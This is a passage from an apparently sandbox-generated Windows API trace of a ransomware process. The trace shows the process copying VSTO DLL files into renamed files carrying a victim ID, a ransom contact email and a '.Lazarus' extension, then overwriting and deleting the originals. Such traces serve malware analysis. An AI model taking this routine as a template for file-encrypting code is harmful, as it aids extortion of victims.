(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.748] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0103.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0103.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0103.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0103.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0103.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0103.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0103.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0103.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0103.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0103.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0103.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0103.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0103.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0103.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0103.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0103.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0103.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0103.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0103.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0103.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0103.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0103.749] AreFileApisANSI () returned 1 [0103.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0103.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f2c8 [0103.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71960, cbMultiByte=-1, lpWideCharStr=0x5f2c8, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 82 [0103.749] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4a6d7a0a, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x30a0)) returned 1 [0103.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0103.750] AreFileApisANSI () returned 1 [0103.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0103.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0103.750] GetLastError () returned 0x0 [0103.750] SetLastError (dwErrCode=0x0) [0103.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4dff8 [0103.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x986d0 [0103.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bbf8 [0103.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0103.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4c8 [0103.750] GetLastError () returned 0x0 [0103.750] SetLastError (dwErrCode=0x0) [0103.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0103.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0103.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8a828 [0103.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0103.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x4ebc8 [0103.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0103.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0103.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0103.751] AreFileApisANSI () returned 1 [0103.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 144 [0103.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120) returned 0x5e870 [0103.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x5e870, cchWideChar=144 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 144 [0103.751] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0103.790] GetFileType (hFile=0x368) returned 0x1 [0103.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e870 | out: hHeap=0x20000) returned 1 [0103.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0103.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0103.790] AreFileApisANSI () returned 1 [0103.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0103.790] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5fe78 [0103.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x5fe78, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 82 [0103.790] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.790] GetFileType (hFile=0x33c) returned 0x1 [0103.790] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0103.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69db0 [0103.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0103.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0103.791] GetLastError () returned 0x0 [0103.791] SetLastError (dwErrCode=0x0) [0103.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0103.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0103.791] GetLastError () returned 0x0 [0103.791] SetLastError (dwErrCode=0x0) [0103.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0103.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0103.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x998e8 [0103.791] ReadFile (in: hFile=0x33c, lpBuffer=0x998e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0103.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0103.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d780 [0103.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8e440 [0103.794] GetLastError () returned 0x0 [0103.794] SetLastError (dwErrCode=0x0) [0103.794] GetLastError () returned 0x0 [0103.794] SetLastError (dwErrCode=0x0) [0103.794] GetLastError () returned 0x0 [0103.794] SetLastError (dwErrCode=0x0) [0103.794] GetLastError () returned 0x0 [0103.794] SetLastError (dwErrCode=0x0) [0103.794] ReadFile (in: hFile=0x33c, lpBuffer=0x998e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.794] WriteFile (in: hFile=0x368, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.795] GetLastError () returned 0x0 [0103.795] SetLastError (dwErrCode=0x0) [0103.796] GetLastError () returned 0x0 [0103.796] SetLastError (dwErrCode=0x0) [0103.796] GetLastError () returned 0x0 [0103.796] SetLastError (dwErrCode=0x0) [0103.796] GetLastError () returned 0x0 [0103.796] SetLastError (dwErrCode=0x0) [0103.796] ReadFile (in: hFile=0x33c, lpBuffer=0x998e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0103.796] WriteFile (in: hFile=0x368, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.796] GetLastError () returned 0x0 [0103.797] SetLastError (dwErrCode=0x0) [0103.797] GetLastError () returned 0x0 [0103.797] SetLastError (dwErrCode=0x0) [0103.797] GetLastError () returned 0x0 [0103.797] SetLastError (dwErrCode=0x0) [0103.797] GetLastError () returned 0x0 [0103.797] SetLastError (dwErrCode=0x0) [0103.797] ReadFile (in: hFile=0x33c, lpBuffer=0x998e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesRead=0x327f0c4*=0xa0, lpOverlapped=0x0) returned 1 [0103.797] ReadFile (in: hFile=0x33c, lpBuffer=0x998e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x998e8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0103.797] WriteFile (in: hFile=0x368, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0103.797] GetLastError () returned 0x0 [0103.798] SetLastError (dwErrCode=0x0) [0103.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d780 | out: hHeap=0x20000) returned 1 [0103.798] WriteFile (in: hFile=0x368, lpBuffer=0x8e440*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8e440*, lpNumberOfBytesWritten=0x327ef70*=0xa0, lpOverlapped=0x0) returned 1 [0103.798] GetLastError () returned 0x0 [0103.798] SetLastError (dwErrCode=0x0) [0103.798] GetLastError () returned 0x0 [0103.798] SetLastError (dwErrCode=0x0) [0103.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0103.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0103.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0103.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0103.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8e440 | out: hHeap=0x20000) returned 1 [0103.798] CloseHandle (hObject=0x368) returned 1 [0103.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x998e8 | out: hHeap=0x20000) returned 1 [0103.799] CloseHandle (hObject=0x33c) returned 1 [0103.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0103.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cce0 [0103.799] AreFileApisANSI () returned 1 [0103.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0103.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5ef58 [0103.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x5ef58, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 82 [0103.799] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0103.800] GetFileType (hFile=0x33c) returned 0x1 [0103.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ef58 | out: hHeap=0x20000) returned 1 [0103.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x998e8 [0103.801] GetLastError () returned 0xb7 [0103.801] SetLastError (dwErrCode=0xb7) [0103.801] WriteFile (in: hFile=0x33c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0103.802] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x998e8 | out: hHeap=0x20000) returned 1 [0103.802] CloseHandle (hObject=0x33c) returned 1 [0103.802] AreFileApisANSI () returned 1 [0103.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0103.802] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f798 [0103.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x719c8, cbMultiByte=-1, lpWideCharStr=0x5f798, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll") returned 82 [0103.802] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOInstallerUI.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\1033\\vstoinstallerui.dll")) returned 1 [0103.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0103.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cce0 | out: hHeap=0x20000) returned 1 [0103.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0103.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0103.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0103.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0103.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0103.803] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4c8 | out: hHeap=0x20000) returned 1 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x986d0 | out: hHeap=0x20000) returned 1 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bbf8 | out: hHeap=0x20000) returned 1 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0103.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.804] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.804] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x5080, dwReserved0=0x1, dwReserved1=0x0, cFileName="VSTOLoaderUI.dll", cAlternateFileName="VSTOLO~1.DLL")) returned 1 [0103.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0103.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0103.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0103.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0103.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0103.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0103.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0103.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0103.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0103.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0103.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0103.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0103.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cce0 [0103.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0103.805] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.805] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.805] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.805] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0103.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.805] AreFileApisANSI () returned 1 [0103.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\10.0\\1033\\VSTOLoaderUI.dll", lpUsedDefaultChar=0x0) returned 79 [0103.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0103.805] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.805] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0103.805] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0103.805] AreFileApisANSI () returned 1 [0103.805] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, 